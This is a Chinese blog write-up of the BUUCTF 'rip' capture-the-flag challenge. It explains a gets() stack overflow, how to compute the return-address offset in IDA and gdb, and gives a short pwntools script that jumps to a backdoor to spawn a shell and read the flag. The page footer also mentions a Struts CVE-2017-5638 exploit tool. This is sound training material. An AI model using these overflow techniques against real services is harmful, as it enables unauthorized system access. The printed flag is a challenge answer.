PWN学习记录(2)BUUCTF-rip

已于 2023-09-23 15:08:58 修改
阅读量297 收藏 3
点赞数 1
文章标签: ubuntu linux 网络安全 笔记
于 2023-07-31 23:20:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58824086/article/details/132030285
版权

文章目录


参考链接:
(buuctf) - pwn入门部分wp - rip – pwn1_sctf_2016 - J1ay - 博客园 (cnblogs.com)
buuctf rip 详细wp - refrain-again - 博客园 (cnblogs.com)
在这里插入图片描述

0x01解题过程

下载题目得到 pwn1,利用 file 命令查看

$ file pwn1

在这里插入图片描述

通过file命令,我们得以辨识该文件的类型。
可以发现,这是一个64位的文件,应该将pwn1用64位的IDA打开
1byte=8bit,可得64位是8个字节,同理32位就是4个字节。

然后我们可以通过checksec ./filename查看保护机制

$ checksec ./pwn1

在这里插入图片描述

查看当前二进制文件的指令架构以及采取了哪些保护机制。
可知该题任何保护都没有打开,所以我们可以实现最简单的栈溢出

将PWN1文件放入IDA中查看。View-Open subviews-Strings打开字符串窗口
在这里插入图片描述
发现 system和**/bin/sh**(存在漏洞)
在这里插入图片描述
打开main函数,F5反编译
在这里插入图片描述
gets函数

gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到\n 结束,则会无限读取,没有上限。

得偏移量的方法①:

在这里插入图片描述

char s[15];可得,在main函数的栈帧中,划分了一个15字节的存储空间,s在上图的Local variables中,由**[rbp-Fh]**可得和rbp的距离为15字节
该程序是64位,则Caller’s rbp有8字节
偏移量15+8

得偏移量的方法②:

回到main函数的图形化界面
在这里插入图片描述
双击s
在这里插入图片描述

偏移量为:15 + 8 = 23 (64位+8;32位+4)

得偏移量的方法③:

可以通过 pattern来计算偏移量

对pwn1进行gdb调试

$ gdb pwn1

在这里插入图片描述
生成溢出字符,需保证其长度能覆盖至RIP

$ pattern create 200

在这里插入图片描述
执行 r 或者 start 命令让程序运行。

注意:start 命令执行后,还需执行 contin 命令

在这里插入图片描述
在 please input 后,将之前生成的溢出字符串粘贴上去。
注意:不要加‘’
在这里插入图片描述
找到RBP的字符串

$ pattern offset  nAACAA-A

在这里插入图片描述
这里计算出的偏移量。不需要考虑堆栈平衡。构造playload时,直接与系统调用地址相加就可。(64位+8;32位+4)
或者:
找到 stack 复制栈顶的字符串 (复制全部或者复制前4个字节),得出偏移地址
在这里插入图片描述

$ pattern offset A(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
or
$ pattern offset AA(A

在这里插入图片描述
在这里插入图片描述

得偏移量的方法④:

可以通过 cyclic来计算偏移量
生成200个有序字符

$ cyclic 200

在这里插入图片描述
gdb调试

$ gdb pwn1

在这里插入图片描述
找到RBP的地址,cyclic -l 地址 计算偏移量

$ cyclic -l 0x6161666161616561

在这里插入图片描述
这里计算出的偏移量。不需要考虑堆栈平衡。构造playload时,直接与系统调用地址相加就可。(64位+8;32位+4)
或者:
找到 stack 复制栈顶的字符串 (复制全部或者复制前4个字节),得出偏移地址
在这里插入图片描述

$ cyclic -l agga
or
$ cyclic -l agaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

在这里插入图片描述

打开fun函数,F5反编译
在这里插入图片描述
回到图形化界面
在这里插入图片描述
双击rbp
在这里插入图片描述
得到地址:0x401186

0x02编写exp

exp编写步骤:
from pwn import *#引入pwn库
p = remote(ip, port) #输入对应的ip地址和端口号来连接其他主机的服务
payload=…+… #输入payload来进行操作以拿到程序的shell
#payload一般为偏移量+地址
p.sendline(payload) #用sendline()将payload向程序输入,程序接收payload对某些变量赋值。
p.interactive() #反弹shell

from pwn import *
p = remote('node4.buuoj.cn', 25990)
payload = b'a' * 23 + p64(0x401186 + 1)
p.sendline(payload)
p.interactive()

①上述 payload中 'a' 可以替换成任意字母。

②字符串中的’b’字符前缀使变量成为字节类型。
参考链接:[Python中的字符串文字前的’b’字符做什么?_cumt30111的博客-CSDN博客]
为了防止python3运行时出现以下错误。 // python2无事。

TypeError: can only concatenate str (not "bytes") to str

③+1 是为了保证堆栈平衡(不加一在本地可以打通,但是却打不通远程)
打开终端,输入vim 1.py 创建一个python文件(命名随意)

$ vim 1.py

在这里插入图片描述
将exp文件输入进1.py中,Esc+:wq保存并退出1.py

夺flag
运行代码

$ python3 1.py
$ ls
$ cat flag

在这里插入图片描述
将得到的flag复制到题目的flag框中:

flag{7873e85b-15fe-4fd0-92d8-d6b15acfe027}

在这里插入图片描述

YunLie_zm
关注
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5125
BUU CTF PWN 入门知识详解
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 752
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
BUUCTF-PWN】2-rip
最新发布
燕麦葡萄干的博客
07-04 128
64位rbp是8位,32位rbp是4位,堆栈平衡需要在后门函数地址+1。查看main函数,gets()存在栈溢出。64位,未开启任何保护。定位到后门函数的地址。
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1562
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
rip-BUUCTF(栈溢出)
yuqie的博客
06-14 366
使用ida反汇编程序,发现是一个栈溢出类型,从函数中可以看出给了一个s数组,但没有对输入的长度作限制,因为是一个典型的栈溢出漏洞。然后从main函数之下的fun函数里可以看见一个后门。顺便记录一下后门地址为0x0000000000401186.先使用命令checksec 查看程序保护情况。 发现并没有canary保护。使用gdb结合pwndbg调试进程,计算我们覆盖到返回地址所需字节。使用快捷命令b在main函数处下断点,并使用r(run)运行。 使用命令 n 按行运行,找到输入点,并随便输入几个字
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 1414
(写得好详细我好爱(为什么payload有两种写法于。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTFrip
^_^
12-08 3305
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
BUUCTFPwnrip 解题步骤
2301_81505831的博客
01-25 836
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
BUUCTF-rip
m0_64180167的博客
04-11 677
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
[buuctf] rip
zn106414的博客
03-31 702
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
BUUCTF -rip
weixin_56301399的博客
07-20 434
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
BUUCTF-rip(新手pwner的成长日记2)
weixin_58410275的博客
04-22 612
什么保护都没有开启,目测是个简单题,其实就是个简单题,初步判定栈溢出的ret2text吧,后续再看情况。
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2528
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
BUUCTF pwn——rip
CNS-Enterprise BCC-1701-J
03-10 318
BUUCTF 做题练习
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值